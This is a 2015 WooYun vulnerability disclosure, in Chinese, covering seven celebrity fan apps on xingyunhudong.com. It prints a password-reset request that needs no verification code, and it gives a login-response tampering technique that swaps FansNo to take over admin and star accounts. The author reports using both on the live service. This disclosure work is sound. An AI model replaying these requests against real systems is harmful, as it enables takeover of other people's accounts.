当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132717

漏洞标题:七款明星专属app任意用户登录(汪苏伦/徐良等/羽泉账号演示)

相关厂商:xingyunhudong.com

漏洞作者: DloveJ

提交时间:2015-08-10 10:58

修复时间:2015-11-08 11:06

公开时间:2015-11-08 11:06

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-10: 细节已通知厂商并且等待厂商处理中
2015-08-10: 厂商已经确认,细节仅向厂商公开
2015-08-13: 细节向第三方安全合作伙伴开放
2015-10-04: 细节向核心白帽子及相关领域专家公开
2015-10-14: 细节向普通白帽子公开
2015-10-24: 细节向实习白帽子公开
2015-11-08: 细节向公众公开

简要描述:

包括7位艺人!

详细说明:

就是羽泉
羽泉的官方APP上线啦!
徐浩朱元冰
徐浩朱元冰的官方APP上线啦!
童可可
童可可的官方APP上线啦!
阿悄
阿悄的官方APP上线啦!
徐良L
徐良的官方APP上线啦!
就是汪苏泷
汪苏泷的官方APP上线啦!
就是许嵩

漏洞证明:

http://www.xingyunhudong.com/


2.jpg

3.jpg


1.jpg


yuquansq.JPG


这里就以羽泉app为例!

修复方案:

====================================
先说一下任意用户密码重置,

S50808-180809.jpg


输入手机号,一直到最后一步抓包!

GET /yq/mobile/forgotPassword?newPassd=yxtest&GroupCode=qiwei&fansAccount=15188888888&newPass=yxtest HTTP/1.1
Host: www.xingyunhudong.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)


这是最后一步。么有任何验证码,可以重置!
=============================重要的来喽=========================================
任意用户登录,在登陆我的账号之后。发现这款app都有一个叫app小编的管理。

S50808-180758.jpg


登陆,确定,抓包!拦截response,将其中的FansNo改为app小编的id,包如下!

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=883B2159EF39D41F1E75B0F59AFCA654; Path=/yq
Content-Type: application/json;charset=UTF-8
Content-Language: zh-CN
Content-Length: 554
Date: Sat, 08 Aug 2015 09:05:09 GMT
{"actionErrors":[],"actionParams":{},"code":0,"data":{"fansInfo":{"FansSex":"男","d":0,"FansNo":*****,"ActAmount":0,"NickName":"yxteat","PointAmount":0,"ExpValue":21,"HuDongAmount":0,"PaiMing":"5535","FootAmount":0,"NextExpValue":150,"LeveLName":"暂无","FansSogan":"此人很懒,什么也没留下","Status":0,"FansFace":"http:\/\/www.xingyunhudong.com\/resource\/images\/fans\/10019396\/face.png","FansLevel":1,"FansAddress":"北京 东城","LeveLImage":"http:\/\/www.xingyunhudong.com\/yq\/themes\/black\/level\/1.png"}},"success":true,"text":""}


fansno已手动打码,登陆之后如下!

S50808-174249.jpg


乌云测试
加个精

S50808-174024.jpg

S50808-174307.jpg


已加精,已删除!
===============
我又登陆了羽泉的账号!

S50808-174543.jpg


明星有好多人加哦

S50808-174718.jpg


==============================================
再来一个“童可可”,貌似是仙剑可赚里的,以前我没有听过

1.jpg


完美的结尾!

S50808-184016.jpg

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-08-10 11:05

厂商回复:

感谢指出漏洞,尽快修复中。

最新状态:

暂无